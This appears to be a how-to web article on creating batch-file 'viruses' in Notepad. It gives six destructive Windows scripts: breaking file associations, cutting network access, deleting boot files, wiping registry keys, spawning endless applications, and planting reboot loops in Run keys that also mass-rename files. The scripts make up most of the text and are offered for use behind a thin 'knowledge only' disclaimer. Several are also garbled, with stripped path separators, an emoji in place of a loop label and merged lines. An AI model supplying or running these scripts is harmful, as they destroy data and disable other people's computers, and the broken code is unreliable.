At starting we want to tell you that what Batch script is. This is nothing but a file which executes the commands automatically in the back end after running any Batch Script. Suppose we can able to create, delete and make a folder on a drive using the Command Prompt Window commands. In the same way, we will combine those commands in a batch file. When somebody will click that file, the operation will start automatically without any further step. Thus it will work as a virus to automatically perform the operation without any need. The Batch script viruses generally created using the notepad application. There are some codes available to create various Batch script viruses.

In this topic, we will show you the process which will provide you the information to create the batch script viruses in PC. Besides that, we will provide you some of the codings of the Viruses which can able to run in PC and make changes creating an error in your system. Moreover, the batch script viruses also perform another effective task which harms your system badly. Thus it is a request to you all that don’t apply these batch script viruses in the negative or wrong way.
How to create Batch Script Viruses?
There some simple steps are given to you through which you can simply create the batch script viruses using Notepad. As notepad application comes on your PC by default so it is easier now to create those viruses.
- Initially, you need to open the notepad application on your PC.
- Now use notepad to create the batch script file for a virus.
- Type the preferred code for the virus which you want to make. Or you can able to copy and paste the code on notepad too.
- After input, the whole code, save the notepad file with any name and with extension .bat only. Like Virus.bat.
What can a Batch Script Virus do?
After creating a batch script virus, if you run it on your system, it will automatically perform the task as programmed inside the script file. Like it can steal information from your PC, delete files, disable the firewall, destroy or modify the registry, irritate in performance, disturbance in processing by CPU, format drives and much more.
How to get recover from batch Script Virus?
There are generally no solutions available to get reach out of these viruses. But you can do some things like use proper up to date high-end antivirus program, if you find this type of file in any removable device or in any source then don’t click on it, etc. Your carefulness is only your security.
Some codes of Batch Script virus which you can create on Notepad:
Now we will refer you some of the batch codes which is generally used to create various virus to make the auto operation in the system. Hence have a look on these codes from the below points.
1. Extension Changer
@echo off
assoc .txt=anything
assoc .exe=anything
assoc .jpeg=anything
assoc .png=anything
assoc .mpeg=anything
2. Stop someone’s internet access
@Echo off
Ipconfig /release
3. Crash a PC Forever
@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
4. Delete the entire registry
@ECHO OFF
START reg delete HKCR/.exe
START reg delete HKCR/.dll
START reg delete HKCR/*
5. Application Bomber
@echo off
😡
start winword
start mspaint
start notepad
start write
start cmd
start explorer
start control
start calc
goto x
6.System Meltdown
:CRASH
net send * WORKGROUP ENABLED
net send * WORKGROUP ENABLED
GOTO CRASH
ipconfig /release
shutdown -r -f -t0
echo @echo off>c:windowshartlell.bat
echo break off>>c:windowshartlell.bat
echo shutdown -r -t 11 -f>>c:windowshartlell.bat
echo end>>c:windowshartlell.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v startAPI /t reg_sz /d c:windowshartlell.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v HAHAHA /t reg_sz /d c:windowshartlell.bat /f
echo You Have Been Hackedecho @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
echo YOU HAVE BEEN HACKED BITCH
REN *.DOC *.TXT
REN *.JPEG *.TXT
REN *.LNK *.TXT
REN *.AVI *.TXT
REN *.MPEG *.TXT
REN *.COM *.TXT
REN *.BAT *.TXT
PAUSE
PAUSE

So that’s all about the Batch Script viruses which you can create using the notepad application on your PC. We already informed you earlier that learn to create virus only for knowledge purpose. Do not try to create them to harm the other systems as well as yours too. Thus by using those viruses, you can able to simply perform the experiments only without harming others. Hope you all are satisfied with the information which we have given or mentioned here about Batch File Viruses. You can also try your own coding to create batch script viruses.